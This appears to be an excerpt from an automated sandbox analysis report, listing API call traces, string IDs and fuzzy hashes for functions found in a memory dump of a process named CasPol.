                                                                                                                                                              • SystemTimeToFileTime.KERNEL32(?,?,?,?), ref: 0040A78C
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000D.00000002.2139245890.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Time$System$File$LocalSpecific
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 979780441-0
                                                                                                                                                              • Opcode ID: e6f681992166f7eacb6a90eac37249c69a118d36aeffaac3dc06015c0a75a69a
                                                                                                                                                              • Instruction ID: f583aad53f3de4022dcae7e9f33737e8013f67213d7447df07319dea818b2b95
                                                                                                                                                              • Opcode Fuzzy Hash: e6f681992166f7eacb6a90eac37249c69a118d36aeffaac3dc06015c0a75a69a
                                                                                                                                                              • Instruction Fuzzy Hash: 48F08272900219AFEB019BB1DC49FBBB3FCBB0570AF04443AE112E1090D774D0058B65
                                                                                                                                                              APIs
                                                                                                                                                              • memcpy.MSVCRT(0045A808,?,00000050,?,0040155D,?), ref: 004134E0
                                                                                                                                                              • memcpy.MSVCRT(0045A538,?,000002CC,0045A808,?,00000050,?,0040155D,?), ref: 004134F2
                                                                                                                                                              • GetModuleHandleW.KERNEL32(00000000), ref: 00413505
                                                                                                                                                              • DialogBoxParamW.USER32(00000000,0000006B,?,Function_000131DC,00000000), ref: 00413519
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000D.00000002.2139245890.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: memcpy$DialogHandleModuleParam
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 1386444988-0
                                                                                                                                                              • Opcode ID: d55c8f406ca3c44be23ebae39d0952233c85391216aaf70b52daa0aa76105663
                                                                                                                                                              • Instruction ID: 364e94b7bdcda47f4d7f1f8d7aeee0d56301a77e6e21c3ce81869cca2c347424
                                                                                                                                                              • Opcode Fuzzy Hash: d55c8f406ca3c44be23ebae39d0952233c85391216aaf70b52daa0aa76105663
                                                                                                                                                              • Instruction Fuzzy Hash: 80F0E272A843207BF7207FA5AC0AB477E94FB05B03F114826F600E50D2C2B988518F8D
                                                                                                                                                              APIs
                                                                                                                                                              • wcschr.MSVCRT ref: 0040F79E
                                                                                                                                                              • wcschr.MSVCRT ref: 0040F7AC
                                                                                                                                                                • Part of subcall function 0040AA8C: wcslen.MSVCRT ref: 0040AAA8
                                                                                                                                                                • Part of subcall function 0040AA8C: memcpy.MSVCRT(00000000,?,00000000,00000000,?,0000002C,?,0040F7F4,?,?,?,?,004032AB,?), ref: 0040AACB
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000D.00000002.2139245890.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: wcschr$memcpywcslen
                                                                                                                                                              • String ID: "
                                                                                                                                                              • API String ID: 1983396471-123907689
                                                                                                                                                              • Opcode ID: a49a7bca3fdcf7d664bb1a19bbfdf9ac20233bdad490a911e177b035a317b33a
                                                                                                                                                              • Instruction ID: b5ec2b97dc3a1d34b4ae52474db4a85f3d32b900c8044ec90cdce640e07fed14
                                                                                                                                                              • Opcode Fuzzy Hash: a49a7bca3fdcf7d664bb1a19bbfdf9ac20233bdad490a911e177b035a317b33a
                                                                                                                                                              • Instruction Fuzzy Hash: 7C315532904204ABDF24EFA6C8419EEB7B4EF44324F20457BEC10B75D1DB789A46CE99
                                                                                                                                                              APIs
                                                                                                                                                              • _snwprintf.MSVCRT ref: 0040A398
                                                                                                                                                              • memcpy.MSVCRT(?,00000000,00000006,00000000,0000000A,%2.2X ,?), ref: 0040A3A8
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000D.00000002.2139245890.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: _snwprintfmemcpy
                                                                                                                                                              • String ID: %2.2X
                                                                                                                                                              • API String ID: 2789212964-323797159
                                                                                                                                                              • Opcode ID: 565383a1db30c24bbe212324ccaa161bb2139c15501903e42e5a35b00c7b7038
                                                                                                                                                              • Instruction ID: 802357eb4f50a043e47c8b78e7782d62930b20b04af67ea92e1f933aeb07fc5a
                                                                                                                                                              • Opcode Fuzzy Hash: 565383a1db30c24bbe212324ccaa161bb2139c15501903e42e5a35b00c7b7038
                                                                                                                                                              • Instruction Fuzzy Hash: 71118E32900309BFEB10DFE8D8829AFB3B9FB05314F108476ED11E7141D6789A258B96
                                                                                                                                                              APIs
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000D.00000002.2139245890.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: _snwprintf
                                                                                                                                                              • String ID: %%-%d.%ds
                                                                                                                                                              • API String ID: 3988819677-2008345750
                                                                                                                                                              • Opcode ID: ff7c17540168d96ed4966b56b0a467b3337874ab214ea8a90bdbbe2252cfc3dc
                                                                                                                                                              • Instruction ID: 7541af853baca77dfc804340e5f0ab0fe899c5989b891af63cf45e557cb41de3
                                                                                                                                                              • Opcode Fuzzy Hash: ff7c17540168d96ed4966b56b0a467b3337874ab214ea8a90bdbbe2252cfc3dc
                                                                                                                                                              • Instruction Fuzzy Hash: B801DE71200204BFD720EE59CC82D5AB7E8FB48308B00443AF846A7692D636E854CB65
                                                                                                                                                              APIs
                                                                                                                                                              • memset.MSVCRT ref: 0040E770
                                                                                                                                                              • SendMessageW.USER32(F^@,0000105F,00000000,?), ref: 0040E79F
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000D.00000002.2139245890.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: MessageSendmemset
                                                                                                                                                              • String ID: F^@
                                                                                                                                                              • API String ID: 568519121-3652327722
                                                                                                                                                              • Opcode ID: f8314852293f46423bc2a010faad31e0b7cb282108ef47112cad279f3d3f551f
                                                                                                                                                              • Instruction ID: 5049a961280a3e8282645b70ff0f7bf8ff78c54eb6baa8beabb6daf17925e322
                                                                                                                                                              • Opcode Fuzzy Hash: f8314852293f46423bc2a010faad31e0b7cb282108ef47112cad279f3d3f551f
                                                                                                                                                              • Instruction Fuzzy Hash: A701A239900204ABEB209F5ACC81EABB7F8FF44B45F008429E854A7291D3349855CF79
                                                                                                                                                              APIs
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000D.00000002.2139245890.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: PlacementWindowmemset
                                                                                                                                                              • String ID: WinPos
                                                                                                                                                              • API String ID: 4036792311-2823255486
                                                                                                                                                              • Opcode ID: 43a26fe09d4836415a0f9153b5f51c370111d8f5fda2234af2192006d5bb601b
                                                                                                                                                              • Instruction ID: 942d740d8c3c01bede0812328a3a4706cce13fdf2e849e9dfea5930b7654417c
                                                                                                                                                              • Opcode Fuzzy Hash: 43a26fe09d4836415a0f9153b5f51c370111d8f5fda2234af2192006d5bb601b
                                                                                                                                                              • Instruction Fuzzy Hash: D4F096B0600204EFEB04DF55D899F6A33E8EF04701F1440B9F909DB1D1E7B89A04C729
                                                                                                                                                              APIs
                                                                                                                                                                • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                                                                                                • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                                                                                                                                • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                                                                                                • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                                                                                                • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                                                                                                                                • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathW), ref: 00414BA4
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000D.00000002.2139245890.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: LibraryLoad$AddressDirectoryProcSystemmemsetwcscatwcscpy
                                                                                                                                                              • String ID: SHGetSpecialFolderPathW$shell32.dll
                                                                                                                                                              • API String ID: 2773794195-880857682
                                                                                                                                                              • Opcode ID: c93510e3b53e51a0fa34588ad362a10002a2b390dcacad00d2ab9882db4cd41e
                                                                                                                                                              • Instruction ID: 520684b8054713cb13715c6c8af1848dbb459e29e8538d47b3508bbaa4bbc045
                                                                                                                                                              • Opcode Fuzzy Hash: c93510e3b53e51a0fa34588ad362a10002a2b390dcacad00d2ab9882db4cd41e
                                                                                                                                                              • Instruction Fuzzy Hash: 23D0C7719483019DD7105F65AC19B8336545B50307F204077AC04E66D7EA7CC4C49E1D
                                                                                                                                                              APIs
                                                                                                                                                              • memcpy.MSVCRT(?,?,00000000,?), ref: 0042BA5F
                                                                                                                                                              • memcpy.MSVCRT(?,?,?,?), ref: 0042BA98
                                                                                                                                                              • memset.MSVCRT ref: 0042BAAE
                                                                                                                                                              • memcpy.MSVCRT(?,?,00000000,?,?,?,?,?,?,?), ref: 0042BAE7
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000D.00000002.2139245890.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: memcpy$memset
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 438689982-0
                                                                                                                                                              • Opcode ID: ef116662622e1dd2984e515fcaedae38b96dc359db8ee055bda91140f73fb117
                                                                                                                                                              • Instruction ID: 797e1fd24865db6de4a95defd5ca955254a0dec7c2ff798398e4890fb9874305
                                                                                                                                                              • Opcode Fuzzy Hash: ef116662622e1dd2984e515fcaedae38b96dc359db8ee055bda91140f73fb117
                                                                                                                                                              • Instruction Fuzzy Hash: 1B51A2B5A00219EBDF14DF55D882BAEBBB5FF04340F54806AE904AA245E7389E50DBD8
                                                                                                                                                              APIs
                                                                                                                                                                • Part of subcall function 0040A13C: memset.MSVCRT ref: 0040A14A
                                                                                                                                                              • ??2@YAPAXI@Z.MSVCRT ref: 0040E84D
                                                                                                                                                              • ??2@YAPAXI@Z.MSVCRT(00000014), ref: 0040E874
                                                                                                                                                              • ??2@YAPAXI@Z.MSVCRT(00000014), ref: 0040E895
                                                                                                                                                              • ??2@YAPAXI@Z.MSVCRT(00000014), ref: 0040E8B6
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000D.00000002.2139245890.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: ??2@$memset
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 1860491036-0
                                                                                                                                                              • Opcode ID: 96af4030734a5e2f6ef23c2ae6277f6dabdb1784b135b246f31e93988d402875
                                                                                                                                                              • Instruction ID: 7dda0de82ffecb18951b1be6aadeef514c87807746e1e94fbb8d74dd8fa57bec
                                                                                                                                                              • Opcode Fuzzy Hash: 96af4030734a5e2f6ef23c2ae6277f6dabdb1784b135b246f31e93988d402875
                                                                                                                                                              • Instruction Fuzzy Hash: 4F21F3B1A003008FDB219F2B9445912FBE8FF90310B2AC8AF9158CB2B2D7B8C454CF15
                                                                                                                                                              APIs
                                                                                                                                                              • wcslen.MSVCRT ref: 0040A8E2
                                                                                                                                                                • Part of subcall function 004099F4: malloc.MSVCRT ref: 00409A10
                                                                                                                                                                • Part of subcall function 004099F4: memcpy.MSVCRT(00000000,?,?,?,?,004027EB,00000004,?,?,?,00401F8F,00000000), ref: 00409A28
                                                                                                                                                                • Part of subcall function 004099F4: free.MSVCRT ref: 00409A31
                                                                                                                                                              • free.MSVCRT ref: 0040A908
                                                                                                                                                              • free.MSVCRT ref: 0040A92B
                                                                                                                                                              • memcpy.MSVCRT(?,?,000000FF,00000000,?,?,00000000,?,0040320A,00000000,000000FF), ref: 0040A94F
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000D.00000002.2139245890.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: free$memcpy$mallocwcslen
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 726966127-0
                                                                                                                                                              • Opcode ID: e8e6c2fed7f9440c8640dc4717368e77cb96f6303dd1ec86a793a42355efe2a9
                                                                                                                                                              • Instruction ID: f32a9ac0308abec2140ef864181b54c8d04bf3279582b466e144db770ea3622c
                                                                                                                                                              • Opcode Fuzzy Hash: e8e6c2fed7f9440c8640dc4717368e77cb96f6303dd1ec86a793a42355efe2a9
                                                                                                                                                              • Instruction Fuzzy Hash: 64217CB2200704EFC720DF18D88189AB3F9FF453247118A2EF866AB6A1CB35AD15CB55
                                                                                                                                                              APIs
                                                                                                                                                              • wcslen.MSVCRT ref: 0040B1DE
                                                                                                                                                              • free.MSVCRT ref: 0040B201
                                                                                                                                                                • Part of subcall function 004099F4: malloc.MSVCRT ref: 00409A10
                                                                                                                                                                • Part of subcall function 004099F4: memcpy.MSVCRT(00000000,?,?,?,?,004027EB,00000004,?,?,?,00401F8F,00000000), ref: 00409A28
                                                                                                                                                                • Part of subcall function 004099F4: free.MSVCRT ref: 00409A31
                                                                                                                                                              • free.MSVCRT ref: 0040B224
                                                                                                                                                              • memcpy.MSVCRT(?,00000000,-00000002,00000000,00000000,?,?,?,?,0040B319,0040B432,00000000,?,?,0040B432,00000000), ref: 0040B248
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000D.00000002.2139245890.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: free$memcpy$mallocwcslen
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 726966127-0
                                                                                                                                                              • Opcode ID: 6421ea3f553dae7d25363b5bd64276aec0fbe05fa0d8b4b2605bf4838246495e
                                                                                                                                                              • Instruction ID: 71128cbd9221161776fa816c6212d75478d488e0bdd8d9cf72ea7cd81dda7be0
                                                                                                                                                              • Opcode Fuzzy Hash: 6421ea3f553dae7d25363b5bd64276aec0fbe05fa0d8b4b2605bf4838246495e
                                                                                                                                                              • Instruction Fuzzy Hash: 02215BB2500604EFD720DF18D881CAAB7F9EF49324B114A6EE452976A1CB35B9158B98
                                                                                                                                                              APIs
                                                                                                                                                              • memcmp.MSVCRT(?,004599B8,00000010,00000000,00409690,?,00408C27,00409690,?,00409690,00408801,00000000), ref: 00408AF3
                                                                                                                                                                • Part of subcall function 00408A6E: memcmp.MSVCRT(00409690,00408B12,00000004,000000FF), ref: 00408A8C
                                                                                                                                                                • Part of subcall function 00408A6E: memcpy.MSVCRT(00000363,004096AA,4415FF50,?), ref: 00408ABB
                                                                                                                                                                • Part of subcall function 00408A6E: memcpy.MSVCRT(-00000265,004096AF,00000060,00000363,004096AA,4415FF50,?), ref: 00408AD0
                                                                                                                                                              • memcmp.MSVCRT(?,00000000,0000000E,00000000,00409690,?,00408C27,00409690,?,00409690,00408801,00000000), ref: 00408B2B
                                                                                                                                                              • memcmp.MSVCRT(?,00000000,0000000B,00000000,00409690,?,00408C27,00409690,?,00409690,00408801,00000000), ref: 00408B5C
                                                                                                                                                              • memcpy.MSVCRT(0000023E,00409690,?), ref: 00408B79
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000D.00000002.2139245890.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: memcmp$memcpy
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 231171946-0
                                                                                                                                                              • Opcode ID: cadc00b77c621a7338fc70958db42bdaca3a8748761d36a10e112d3b7644ebb1
                                                                                                                                                              • Instruction ID: 684d12db3f6cc64b33ac9287d8c213aaad77bc3869a84850190dd4d7d2050874
                                                                                                                                                              • Opcode Fuzzy Hash: cadc00b77c621a7338fc70958db42bdaca3a8748761d36a10e112d3b7644ebb1
                                                                                                                                                              • Instruction Fuzzy Hash: 8411A9F1600308AAFF202A129D07F5A3658DB21768F25443FFC84641D2FE7DAA50C55E
                                                                                                                                                              APIs
                                                                                                                                                              • strlen.MSVCRT ref: 0040B0D8
                                                                                                                                                              • free.MSVCRT ref: 0040B0FB
                                                                                                                                                                • Part of subcall function 004099F4: malloc.MSVCRT ref: 00409A10
                                                                                                                                                                • Part of subcall function 004099F4: memcpy.MSVCRT(00000000,?,?,?,?,004027EB,00000004,?,?,?,00401F8F,00000000), ref: 00409A28
                                                                                                                                                                • Part of subcall function 004099F4: free.MSVCRT ref: 00409A31
                                                                                                                                                              • free.MSVCRT ref: 0040B12C
                                                                                                                                                              • memcpy.MSVCRT(?,?,00000000,00000000,0040B35A,?), ref: 0040B159
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000D.00000002.2139245890.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: free$memcpy$mallocstrlen
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 3669619086-0
                                                                                                                                                              • Opcode ID: 1049280fa2475c497c1b628b605c6dc2082e028c9e0fefa85919baabf6481477
                                                                                                                                                              • Instruction ID: 61abf4b4d63bdfee40e3433ef4540d9b033b11d4199be086b3082c0bee804e2f
                                                                                                                                                              • Opcode Fuzzy Hash: 1049280fa2475c497c1b628b605c6dc2082e028c9e0fefa85919baabf6481477
                                                                                                                                                              • Instruction Fuzzy Hash: CA113A712042019FD711DB98FC499267B66EB8733AB25833BF4045A2A3CBB99834865F
                                                                                                                                                              APIs
                                                                                                                                                              • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00418178,000000FF,00000000,00000000,00417D63,?,?,00417D63,00418178,00000000,?,004183E5,?,00000000), ref: 004173FF
                                                                                                                                                              • malloc.MSVCRT ref: 00417407
                                                                                                                                                              • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00418178,000000FF,00000000,00000000,?,00417D63,00418178,00000000,?,004183E5,?,00000000,00000000,?), ref: 0041741E
                                                                                                                                                              • free.MSVCRT ref: 00417425
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000D.00000002.2139245890.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: ByteCharMultiWide$freemalloc
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 2605342592-0
                                                                                                                                                              • Opcode ID: c62e76641e050cafa551b594d013d2ba0ec055e9779dbb9c6b02089c0e2d57f7
                                                                                                                                                              • Instruction ID: cad4d062c051d68cf548c6c9b5623cfc012c7edadb1d539185634ca375d1558c
                                                                                                                                                              • Opcode Fuzzy Hash: c62e76641e050cafa551b594d013d2ba0ec055e9779dbb9c6b02089c0e2d57f7
                                                                                                                                                              • Instruction Fuzzy Hash: E7F0377620921E7BDA1029655C40D77779CEB8B675B11072BBA10D21C1ED59D81005B5